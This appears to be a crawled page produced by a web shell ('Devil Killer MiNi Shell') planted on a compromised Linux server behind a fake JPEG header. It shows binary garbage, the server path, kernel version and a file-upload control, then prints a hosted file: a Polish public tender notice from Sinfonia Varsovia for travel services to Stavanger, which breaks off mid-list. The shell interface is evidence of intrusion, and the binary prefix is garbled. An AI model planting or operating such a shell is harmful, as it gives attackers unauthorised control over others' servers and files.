JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220902/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220902/0033204201-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Obsługa podróży zagranicznej dla projektu: „Interakcje-Integracje” w zakresie programu &#34;Kultura&#34; Działanie 2 &#34;Poprawa dostępu do kultury i sztuki&#34; w ramach Mechanizmu Finansowego EOG 2014-2021. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">SINFONIA VARSOVIA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 141246217</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Grochowska 272</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">03-849</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">(022) 582 70 82 lub (022) 582 70 72</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@sinfoniavarsovia.org</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.sinfoniavarsovia.org</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Samorządowa Instytucja Kultury </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Obsługa podróży zagranicznej dla projektu: „Interakcje-Integracje” w zakresie programu &#34;Kultura&#34; Działanie 2 &#34;Poprawa dostępu do kultury i sztuki&#34; w ramach Mechanizmu Finansowego EOG 2014-2021. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0d5b1115-29d8-11ed-8832-4e4740e186ac</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00332042</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-09-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00061025/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.7 Kompleksowa obsługa podróży krajowych i zagranicznych w ramach Mechanizmu Finansowego EOG 2014-2021”.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://www.bip.sinfoniavarsovia.org/postepowania-pzp/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja w postępowaniu, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między zamawiającym a wykonawcą, z uwzględnieniem wyjątków określonych w przepisach PZP, odbywa się przy użyciu środków komunikacji elektronicznej.<br/>W postępowaniu o udzielenie zamówienia komunikacja między zamawiającym a wykonawcami w zakresie:<br/>1) składania ofert (a także zmiany lub wycofania oferty) odbywa się przy użyciu miniPortalu https://miniportal.uzp.gov.pl/ oraz strony<br/>ePUAP https://epuap.gov.pl/wps/portal; niedopuszczalne jest złożenie lub zmiana oferty poprzez przesłanie jej na adres e-mail -<br/>oferta przesłana w taki sposób zostanie odrzucona zgodnie z art. 226 ust. 1 pkt 6 PZP;<br/>2) który nie dotyczy składania ofert - odbywa się elektronicznie za pośrednictwem poczty elektronicznej pod adresem e-mail<br/>wskazanym do korespondencji w rozdziale I SWZ;<br/>Adres strony internetowej prowadzonego postępowania:<br/>https://www.bip.sinfoniavarsovia.org/postepowania-pzp/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne<br/>wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji<br/>przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z<br/>elektronicznej platformy usług administracji publicznej (ePUAP).<br/>Wykonawca zamierzający wziąć udział w postępowaniu musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP<br/>ma dostęp do następujących formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz do „Formularza do<br/>komunikacji”.<br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania<br/>oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB.<br/>Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii<br/>dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP.<br/>Z wyłączeniem złożenia, zmiany i wycofania oferty, komunikacja w postępowaniu pomiędzy zamawiającym a wykonawcami, w<br/>szczególności składanie oświadczeń, wniosków, zawiadomień oraz przekazywanie informacji odbywa się elektronicznie za<br/>pośrednictwem poczty elektronicznej – adres: dorota.żurek@sinfoniavarsovia.org We wszelkiej korespondencji związanej z<br/>postępowaniem zamawiający i wykonawcy posługują się numerem postępowania nadanym przez zamawiającego.<br/>Osobą uprawnioną do komunikowania się z wykonawcami w imieniu zamawiającego jest:<br/>Dorota Żurek, adres email: dorota.żurek@sinfoniavarsovia.org.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Administratorem danych osobowych jest Sinfonia Varsovia z siedzibą pod adresem: 03-<br/>849 Warszawa, ul. Grochowska 272, wpisana do Rejestru Instytucji Kultury m. st. Warszawy pod nr RIA/2/08 (zwana dalej<br/>„administratorem”).<br/>Administrator wyznaczył inspektora ochrony danych, z którym można skontaktować się pisemnie na adres administratora lub<br/>poprzez e-mail: sekretariat@sinfoniavarsovia.org. Z inspektorem ochrony danych można kontaktować się we wszystkich sprawach<br/>dotyczących przetwarzania danych osobowych oraz korzystania z praw związanych z przetwarzaniem.<br/>Dane osobowe będą przetwarzane w celu udzielenia zamówienia publicznego na podstawie art. 6 ust. 1 pkt c) RODO, tj. ze względu<br/>na to, że przetwarzanie jest niezbędne do wypełnienia obowiązku prawnego ciążącego na administratorze polegającego na<br/>obowiązku stosowania przepisów ustawy z dnia 11-09-2019 r. - Prawo zamówień publicznych.<br/>Podanie danych osobowych jest wymogiem ustawowym; konsekwencją niepodania danych będzie brak możliwości udziału w<br/>postępowaniu o udzielenie zamówienia publicznego.<br/>Odbiorcami danych osobowych będą uczestnicy postępowania o udzielenie zamówienia publicznego, osoby, którym zostanie<br/>udostępniona dokumentacja dotycząca postępowania o udzielenie zamówienia publicznego na podstawie art. 18 i art. 74 PZP,<br/>operator miniPortalu prowadzonego przez Urząd Zamówień Publicznych, a także podmioty świadczące na rzecz administratora<br/>usługi informatyczne, usługi pocztowe oraz usługi prawne.<br/>Dane osobowe nie będą przekazywane do państwa trzeciego, tj. poza obszar Europejskiego Obszaru Gospodarczego, ani<br/>organizacji międzynarodowej.<br/>Dane osobowe będą przechowywane przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia publicznego, a<br/>jeżeli czas trwania umowy w sprawie zamówienia publicznego przekracza 4 lata, okres przechowywania cały okres obowiązywania<br/>umowy w sprawie zamówienia publicznego.<br/>Osobie, której dane są przetwarzane, przysługuje:<br/>1) na podstawie art. 15 RODO prawo dostępu do swoich danych osobowych;<br/>2) na podstawie art. 16 RODO prawo żądania sprostowania lub uzupełnienia swoich danych osobowych;<br/>3) na podstawie art. 18 RODO prawo żądania ograniczenia przetwarzania swoich danych osobowych. <br/>Skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16<br/>RODO, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w<br/>sprawie zamówienia publicznego w zakresie niezgodnym z przepisami PZP, a także nie może naruszać integralności protokołu<br/>postępowania oraz jego załączników.<br/>W postępowaniu o udzielenie zamówienia publicznego zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust.<br/>1 RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.<br/>Osobie, której dane są przetwarzane, nie przysługuje:<br/>1) prawo do usunięcia danych osobowych;<br/>2) prawo wniesienia sprzeciwu wobec przetwarzania swoich danych osobowych, ponieważ przetwarzanie danych osobowych nie jest<br/>oparte na art. 6 ust. 1 lit. e) lub f) RODO.<br/>W trakcie przetwarzania danych osobowych nie będzie następować zautomatyzowane podejmowanie decyzji oraz nie jest<br/>stosowane profilowanie.<br/>Osobie, której dane są przetwarzane, przysługuje prawo wniesienia skargi do organu nadzorczego, tj. Prezesa Urzędu Ochrony<br/>Danych Osobowych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/TP/8/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 235067,33 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest obsługa podróży zagranicznej z Warszawy do Stavanger i z powrotem w zakresie rezerwacji i<br/>wykupu biletów lotniczych, zapewnienia przejazdów autobusowych oraz miejsc noclegowych w dniach 22-27.10.2022 r. na<br/>potrzeby realizacji projektu pod nazwą „Interakcje-Integracje” w zakresie programu „Kultura” Działanie 2 „Poprawa dostępu<br/>do kultury i sztuki” w ramach Mechanizmu Finansowego EOG 2014-2021. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">63512000-1 - Usługi sprzedaży biletów podróżnych i pakietów wycieczkowych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">55110000-4 - Hotelarskie usługi noclegowe</p> <p class="mb-0">63516000-9 - Usługi zarządzania podróżą</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-10-29</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający<br/>przewiduje udzielenie zamówienia z wolnej ręki, o którym mowa w art. 214 ust. 1 pkt 7 PZP, poprzez udzielenie, w okresie 3 lat od<br/>dnia udzielenia zamówienia podstawowego, dotychczasowemu wykonawcy usług, zamówień polegających na powtórzeniu<br/>podobnych usług w postaci rezerwacji i wykupu dodatkowych biletów lotniczych, zapewnienia przejazdów autobusowych oraz miejsc<br/>noclegowych na trasie: Warszawa-Stavanger-Warszawa.<br/>Wielkość zamówień uzupełniających nie przekroczy 10% wielkości zamówienia podstawowego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający oceni oferty pod względem spełniania warunków formalnych; oferty nie spełniające<br/>warunków określonych w przepisach PZP oraz w postanowieniach SWZ zostaną odrzucone w przypadkach określonych w<br/>przepisach PZP.<br/>Zamawiający oceni oferty według następujących kryteriów oceny ofert:<br/>Cena brutto za realizację całego zamówienia – 100 %.<br/>Łączna ilość punktów uzyskanych przez oferty w kryterium cena, zostanie przeliczona według poniższego wzoru:<br/>C = (Cn/Cb x 100%) x 100<br/>gdzie:<br/>C – cena łączna<br/>Cn – cena najniższa spośród ocenianych ofert<br/>Cb – cena badanej oferty.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:<br/>1) spełniają warunki udziału w postępowaniu określone w SWZ,<br/>2) nie podlegają wykluczeniu z postępowania z przyczyn określonych w SWZ.<br/>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym - w odniesieniu do tego warunku zamawiający nie formułuje<br/>wymagań;<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów -<br/>w odniesieniu do tego warunku zamawiający nie formułuje wymagań;<br/>3) sytuacji ekonomicznej lub finansowej - w odniesieniu do tego warunku zamawiający nie formułuje wymagań;<br/>4) zdolności technicznej lub zawodowej - w odniesieniu do tego warunku zamawiający wymaga, aby wykonawca wykazał,<br/>że:<br/>a) w okresie ostatnich 3 lat (licząc wstecz od dnia, w którym upływa termin składania ofert), a jeżeli okres prowadzenia<br/>działalności jest krótszy – w tym okresie wykonał należycie (a w przypadku świadczeń powtarzających się lub ciągłych<br/>również wykonuje należycie) co najmniej 2 usługi polegające organizacji podróży (wyjazdu) zagranicznego w zakresie<br/>rezerwacji i zakupu biletów lotniczych lub noclegów na trasach zagranicznych o wartości nie mniejszej niż 30.000,00 zł<br/>brutto każda usługa, przy czym w przypadku usług nadal wykonywanych, faktycznie wykonany zakres usług powinien<br/>spełniać powyższe wymogi na dzień składania ofert; wartość usługi rozumiana jest jako całkowite wynagrodzenie<br/>wykonawcy za wykonanie usługi, w tym wartość biletów lub noclegów, obejmujące zarówno cenę za usługę rezerwacji, jak i<br/>wartość zakupionych biletów i noclegów;<br/>b) wykonawca posiada aktualny certyfikat Międzynarodowego Zrzeszenia Przewoźników Lotniczych IATA (International Air Transport Association). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu<br/>potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniu oraz spełniania przez wykonawcę warunków<br/>udziału w postępowaniu zamawiający żąda złożenia następujących podmiotowych środków dowodowych:<br/>1) oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 PZP, o braku przynależności do tej samej grupy kapitałowej w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, z innym wykonawcą, który złożył odrębną ofertę,<br/>albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi<br/>przygotowanie oferty niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej; wzór oświadczenia stanowi<br/>załącznik nr 4 do SWZ;<br/>2) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4 PZP, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji;<br/>3) wykazu usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich<br/>3 lat (licząc wstecz od dnia, w którym upływa termin składania ofert), a jeżeli okres prowadzenia działalności jest krótszy - w tym<br/>okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są<br/>wykonywane; wykaz ten powinien potwierdzać, iż wykonawca spełnia warunki udziału w postępowaniu określone w rozdziale VII ust.<br/>2 pkt 4 lit. a SWZ; wzór wykazu wykonanych usług stanowi załącznik nr 9 do SWZ;<br/>4) aktualny certyfikat Międzynarodowego Zrzeszenia Przewoźników Lotniczych IATA (International Air Transport Association), który<br/>potwierdzi, iż wykonawca spełnia warunki udziału w postępowaniu określone w rozdziale VII ust. 2 pkt 4 lit. b SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (np. w ramach spółki cywilnej lub konsorcjum).<br/>W przypadku, o którym mowa w ust. 1, wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o<br/>udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>Pełnomocnictwo powinno być załączone do oferty.<br/>Zamawiający nie wymaga od wykonawców wspólnie ubiegających się o udzielenie zamówienia posiadania określonej formy<br/>prawnej w celu złożenia oferty.<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy i<br/>wniesienie zabezpieczenia należytego wykonania umowy, jeżeli jest wymagane.<br/>Postanowienia SWZ dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia.<br/>W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym mowa w art. 125 ust. 1<br/>PZP, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków<br/>udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają usługi, do<br/>realizacji których te zdolności są wymagane.<br/>W przypadku, o którym mowa w ust. 6, wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy, którego wzór stanowi załącznik nr 8 do SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Wszelkie zmiany Umowy wymagają zachowania formy pisemnej pod rygorem nieważności i mogą być dokonane w granicach określonych art. 455 ust. 1 Ustawy. <br/>Zamawiający przewiduje możliwość dokonania zmiany Umowy w przypadkach określonych w przepisach prawa oraz w razie:<br/>1)	otrzymania 